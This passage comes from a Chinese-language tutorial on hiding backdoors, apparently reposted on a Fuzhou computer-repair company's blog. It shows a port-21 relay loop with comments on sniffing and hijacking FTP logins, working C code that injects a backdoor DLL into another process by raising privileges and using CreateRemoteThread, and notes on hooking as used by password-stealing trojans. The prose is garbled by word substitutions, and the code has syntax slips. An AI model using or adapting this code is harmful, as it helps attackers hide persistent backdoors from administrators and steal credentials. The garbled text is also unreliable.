浅析后门隐藏技术

  return -1;
  }
  while(1)
  {
  //下面的代码主要是完成经过127。0。0。1这个地址把包转发到真正的使用上，并把应答的包再转发回去。
  //如果是嗅探内容的话，此处举行内容分析和记载
  //如果是打击如FTP服务器，使用其高权限登岸用户的话，可以分析其登岸用户，然后使用发送特定的包以挟制的用户身份执行。
  num = recv(ss,(char *)buf,4096,0);
  if(num>0)
  {
  //嗅探打印
  buf[num] = '\0';
  printf("%s", buf);
  send(sc,(char *)buf,num,0);
  }
  else if(num==0)
  break;
  num = recv(sc,(char *)buf,4096,0);
  if(num>0)
  send(ss,(char *)buf,num,0);
  else if(num==0)
  break;
  }
  closesocket(ss);
  closesocket(sc);
  return 0 ;
  }
  这个例子复用的是21端口，也就是FTP用的端口，各人也可以看一下wxhshell这个后门，它是winshell经火狐的虚灵幻者修正以后生成的后门，在winshell的基础上完成了端口复用，使winshell的功效变的越发强大。
  b.       Raw socket编程
  使用raw编程可以使后门隐蔽得十分好，因为使用了Raw socket编程技术的后门可以完全体现得无端口、无毗连，穿透绝大部门防火墙，而且不仅是后门，就连许多的打击工具都采用了这用技术，好比Synflood，不外虽然可以用Raw socket编程完成后门编写，但由于采用此技术写的后门在传输大数据的工夫不稳固，而且编写的工夫也比较贫苦，在此不外多讨论。各人如果有兴味的话，可以到宁静焦点上找一下refdom年老写的有关Raw socket 编程的文章，配合MSDN来看，定能事半功倍;)。
  c.       远程注入DLL
  没错，现在讨论的就是传说中的远程注入技术，现在一种十分流行的隐蔽技术，因为它没有进程，而前面讨论的两种方法都市有进程出现，因而，有履历的办理员很容易发现，然后先杀进程，在找出后门文件删除。要完成远程注入，我们要编写两个程序，一个是后门文件，这里不是把它写成.exe文件，而是写成.dll文件，在这里先说一下.dll文件，.dll文件，其实就是静态毗连库，它内里装封了提供.exe文件挪用的函数，一样平常环境下，双击它，是不能运转它的，它只能由.exe来挪用，于是就有了远程注入了，原理很简单：我们把后门的主要功效写成一个函数，然后装封到.dl文件中，然后再另外写一个执行文件来启动它，这样就不会有后门的进程了。那远程注入又指什么呢？这个问题问得好，一样平常环境下，每个进程都有本身的公有空间，理论上，另外进程是不容许对这个私人空间举行操作的，但是，我们可以使用一些方法进入这个空间并举行操作，将本身的代码写入正在运转的进程中，于是就有了远程注入了。
  对dll后门的编写就不作过多的讨论了，现在来看完成注入功效的可执行文件的编写：
  用到的函数有：
  OpenProcessToken()；
  LookupPrivilegeValue()；
  AdjustTokenPrivileges()；
  OpenProcess()；
  VirtualAllocEx()；
  WriteProcessMemory()；
  GetProcAddress()；
  CreateRemoteThread()；
  先简单的介绍以下这些函数的作用，因为我们要操作的是体系中的其他进程，如果没有足够的体系权限，我们是无法写入甚至连读取其它进程的内存地址的，所以我们就需要提升本身的权限，用到以下3个函数
  OpenProcessToken()； //翻开进程令牌
  LookupPrivilegeValue()；//前往一个本地体系无独有偶的ID，用于体系权限变动
  AdjustTokenPrivileges()；//从英文意思也能看出它是变动进程权限用的吧？
  进入宿主进程的内存空间
  在拥有了进入宿主进程空间的权限之后，我们就需要在其内存参加让它加载我们后门的代码了，用LoadLibraryA()函数就可以加载我们的DLL了，它只需要DLL文件的途径就可以了，在这里我们要把DLL文件的途径写入到宿主的内存空间里，因为DLL的文件途径并不存在于宿主进程内存空间了，用到的函数有：
  OpenProcess()；//用于修正宿主进程的一些属性，详细参看MSDN
  VirtualAllocEx()；//用于在宿主内存空间中请求内存空间以写入DLL的文件名
  WriteProcessMemory();//往请求到的空间中写入DLL的文件名
  在宿主中启动新的线程
  用的是LoadLibraryA()函数来加载，但在使用LoadLibraryA()之前必需知道它的入口地址，所以用GetProcAdress来获得它的入口地址，有了它的地址以后，就可以用CreateRemoteThread()函数来启动新的线程了，到次，整个注入过程完成，不外还不十分完善，这就留给智慧的你来完成了；）。
  简单的例子：
  #include "stdafx.h"
  int EnableDebugPriv(const char * name)
  {
  HANDLE hToken;
  TOKEN_PRIVILEGES tp;
  LUID luid;
  //翻开进程令牌环
  OpenProcessToken(GetCurrentProcess(),
  TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
  &hToken);
  //获得进程本地独一ID
  LookupPrivilegeValue(NULL,name,&luid)
  tp.PrivilegeCount = 1;
  tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  tp.Privileges[0].Luid = luid;
  //调整权限
  AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
  return 0;
  }
  BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
  {
  HANDLE hRemoteProcess;
  EnableDebugPriv(SE_DEBUG_NAME)
  //翻开远程线程
  hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //容许远程创立线程PROCESS_VM_OPERATION | //容许远程VM操作
  PROCESS_VM_WRITE,//容许远程VM写
  FALSE, dwRemoteProcessId );
  char *pszLibFileRemote;
  //使用VirtualAllocEx函数在远程进程的内存地址空间分派DLL文件名空间
  pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
  MEM_COMMIT, PAGE_READWRITE);
  //使用WriteProcessMemory函数将DLL的途径名写入到远程进程的内存空间
  WriteProcessMemory(hRemoteProcess,
  pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL)；
  //计算LoadLibraryA的入口地址
  PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
  GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
  //启动远程线程LoadLibraryA，经过远程线程挪用创立新的线程
  HANDLE hRemoteThread;
  if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
  {
  printf("CreateRemoteThread error!\n");
  return FALSE;
  }
  return TRUE;
  }
  int APIENTRY WinMain(HINSTANCE hInstance,
  HINSTANCE hPrevInstance,
  LPSTR     lpCmdLine,
  int     nCmdShow)
  {
  InjectDll("c:\\zrqfzr.dll",3060) //这个数字是你想注入的进程的ID号
  return 0;
  }
  d.       Hook技术
  Hook，即钩子，各人知道，WINDOWS是基于消息机制的，而Hook的本意是从体系正常的消息作业中把要监听的消息钩出来，先进入本身的代码中操作一番，之后在把消息放回正常的作业中；或者把该消息竣事，不让体系其它进程失掉和处理它。
  据我所知，大部门暴徒号木马都是采用了Hook技术才到达盗号目的的，因为号码和暗码的通报也是基于消息机制的，但具体怎样完成盗号，我没深化研究，所以这里说不明白，而常见的使用Hook技术隐蔽后门的方法包罗Hook recv函数/Hook WSARecv函数，修正IAT导上天址表等。因为要完成隐蔽需要较深的体系编程功底，而且占用较多的工夫来解说，恐怕会浪费各人工夫，所以在此也不详细讨论，各人有兴味可以上彀找一下相关的资料。
  其实要完成后门的隐蔽，方法远不止这几种，只需各人平时多把稳，一定能学到更多更好的隐蔽技术。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：